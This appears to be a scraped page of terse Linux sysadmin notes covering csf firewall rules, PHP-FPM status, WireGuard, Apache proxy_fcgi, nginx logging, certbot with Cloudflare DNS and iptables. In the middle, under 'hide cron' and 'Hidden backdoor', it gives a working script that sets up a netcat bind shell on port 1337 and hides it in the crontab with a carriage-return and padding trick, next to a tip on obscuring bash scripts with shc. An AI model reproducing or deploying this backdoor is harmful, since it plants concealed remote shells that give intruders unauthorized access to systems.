vi /etc/security/limits.conf
* - nofile 524288
Failed opening /var/log/syslog: open /var/log/syslog: too many open files
Leave a reply
csf allow ssh specific IP
vi /etc/csf/csf.allow
192.168.100.100
vi /etc/csf/csf.conf
TCP_IN section remove your SSH port
or
vi /etc/csf/csf.conf
tcp|in|d=22|s=192.168.100.100
csf -ra
SSLCertificateFile: file ‘/etc/pki/tls/certs/localhost.crt’ does not exist or is empty
/usr/libexec/httpd-ssl-gencerts
PHP-FPM get status
cat /etc/php/7.4/fpm/pool.d/www.conf | grep -v \; | awk 'NF' | tee /etc/php/7.4/fpm/pool.d/www.conf
vi /etc/php/7.4/fpm/pool.d/www.conf
pm.status_path=/status
ping.path=/ping
ping.response=pong
apt install fcgiwrap
ss -l | grep php
u_strLISTEN 0 511 /run/php/php7.4-fpm.sock 79744 * 0
SCRIPT_NAME=/status \
SCRIPT_FILENAME=/status \
REQUEST_METHOD=GET \
cgi-fcgi -bind -connect /run/php/php7.4-fpm.sock
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Content-type: text/plain;charset=UTF-8
pool: www
process manager: dynamic
start time: 07/Feb/2021:13:44:50 +0200
start since: 382
accepted conn: 3
listen queue: 0
max listen queue: 0
listen queue len: 0
idle processes: 1
active processes: 1
total processes: 2
max active processes: 1
max children reached: 0
slow requests: 0
wireguard setup
add-apt-repository ppa:wireguard/wireguard
apt-get update
apt install wireguard
MacOS
brew install wireguard-tools
wg genkey | tee privatekey | wg pubkey > publickey
Server side:
/etc/wireguard/wg0.conf
[Interface]
Address = 10.0.0.1/24
DNS = 1.1.1.1
PrivateKey = [ServerPrivateKey]
ListenPort = 51820
PostUp = iptables -A FORWARD -i %i -j ACCEPT; iptables -A FORWARD -o %i -j ACCEPT; iptables -t nat -A POSTROUTING -o enp9s0 -j MASQUERADE
PostDown = iptables -D FORWARD -i %i -j ACCEPT; iptables -D FORWARD -o %i -j ACCEPT; iptables -t nat -D POSTROUTING -o enp9s0 -j MASQUERADE
[Peer]
#Peer #1
PublicKey = [Peer#1PublicKey]
AllowedIPs = 10.0.0.3/32
[Peer]
#Peer #2
PublicKey = [Peer#2PublicKey]
AllowedIPs = 10.0.0.10/32
[Peer]
#Peer #3
PublicKey = [Peer#3PublicKey]
AllowedIPs = 10.0.0.2/32
[Peer]
#Peer #4
PublicKey = [Peer#4PublicKey]
AllowedIPs = 10.0.0.11/32
Client side:
/etc/wireguard/wg0.conf
[Interface]
Address = 10.0.0.3/24
PrivateKey = [PrivateKeyPeer#1]
[Peer]
PublicKey = [ServerPublicKey]
Endpoint = some.domain.com:51820
AllowedIPs = 0.0.0.0/0
# This is for if you're behind a NAT and
# want the connection to be kept alive.
PersistentKeepalive = 25
Start/stop interface
wg-quick up wg0
wg-quick down wg0
Start/stop service
$ sudo systemctl stop [email protected]
$ sudo systemctl start [email protected]
Instead of having to modify the file for every client you want to add to the
server you could also use the wg tool instead:
# add peer
wg set wg0 peer
# verify connection
wg
# save to config
wg-quick save wg0
proxy_fcgi apache
apt install apache2 php7.4-fpm
a2enconf php7.4-fpm
a2enmod proxy proxy_fcgi
cat /etc/apache2/conf-enabled/php7.4-fpm.conf
# Redirect to local php-fpm if mod_php is not available
<IfModule !mod_php7.c>
<IfModule proxy_fcgi_module>
# Enable http authorization headers
<IfModule setenvif_module>
SetEnvIfNoCase ^Authorization$ "(.+)" HTTP_AUTHORIZATION=$1
</IfModule>
<FilesMatch ".+\.ph(ar|p|tml)$">
SetHandler "proxy:unix:/run/php/php7.4-fpm.sock|fcgi://localhost"
</FilesMatch>
<FilesMatch ".+\.phps$">
# Deny access to raw php sources by default
# To re-enable it's recommended to enable access to the files
# only in specific virtual host or directory
Require all denied
</FilesMatch>
# Deny access to files without filename (e.g. '.php')
<FilesMatch "^\.ph(ar|p|ps|tml)$">
Require all denied
</FilesMatch>
</IfModule>
</IfModule>
proxy_fcgi:error AH01071: Got error Primary script unknown
File not found.
This error message means there are no such file.
encrypt bash
hide bash code using c:
apt install shc
shc -f mybash.sh
hide cron
printf "* * * * * >/tmp/x;\rno crontab for $USER\n" | crontab -
crontab -l
no crontab for vit
Hidden backdoor:
BDOOR_PT=1337
BDOOR_SH="{ \
cd /tmp; mkfifo .i .o; \
cat .o | nc -l -p ${BDOOR_PT} > .i & \
/bin/sh < .i &>.o ; rm -f .i .o; \
}"
# scheduled task that will be hidden
HIDDEN="* * * * * ${BDOOR_SH}>/dev/null 2>&1"
# Display the current cron table and modify the first line
crontab -l 2>&1 | {
read FIRST_TASK;
if [ ${#HIDDEN} -gt ${#FIRST_TASK} ]; then
# end the first crontab line with spaces to hide our backdoor and
# one more character (";").
while (( i < (${#HIDDEN} - ${#SHOWN_TASK} + 1) )); do
FIRST_TASK="${FIRST_TASK} "; ((i++))
done
fi
# carriage return goes there ("\r")
printf "${HIDDEN};\r${FIRST_TASK}\n"; cat
} | crontab -
if [ $? -eq 0 ]; then
echo "Backdoor is now hidden in cron table"
echo "Shell will be bind on port ${BDOOR_PT}."
else
echo "Failed."
fi
nginx log response time
vi /etc/nginx/nginx.conf
log_format timed_combined '$remote_addr - $remote_user [$time_local] '
'"$request" $status $body_bytes_sent '
'"$http_referer" "$http_user_agent" '
'$request_time $upstream_response_time $pipe';
access_log /var/log/nginx/srv24x7.com.access.log timed_combined;
certbot cloudflare DNS authentication API
add-apt-repository ppa:certbot/certbot
apt install software-properties-common
apt update
apt install python-certbot-nginx
apt install python-pip
pip install certbot-dns-cloudflare
vi /root/.secrets/cloudflare.cfg
dns_cloudflare_api_key = “xxx”
certbot certonly –dns-cloudflare –dns-cloudflare-credentials /root/.secrets/cloudflare.ini -d domain.com,*.domain.com –preferred-challenges dns-01
prestashop more language nginx rewrite
An error occurred while processing your request “, nginx multilingual shop
location ~ (/lt|/en)/index\.php$ {
try_files $uri $uri/ /index.php?$args;
}
great suspender malware
great suspender alternative is Tab Suspender
centos iptables save after reboot
yum install iptables-services
service iptables save
iptables: Saving firewall rules to /etc/sysconfig/iptables:[ OK ]
An unexpected error occurred: pkg_resources.VersionConflict: (acme 0.31.0 (/usr/lib/python3/dist-packages), Requirement.parse(‘acme>=1.8.0’))
pip3 install --upgrade acme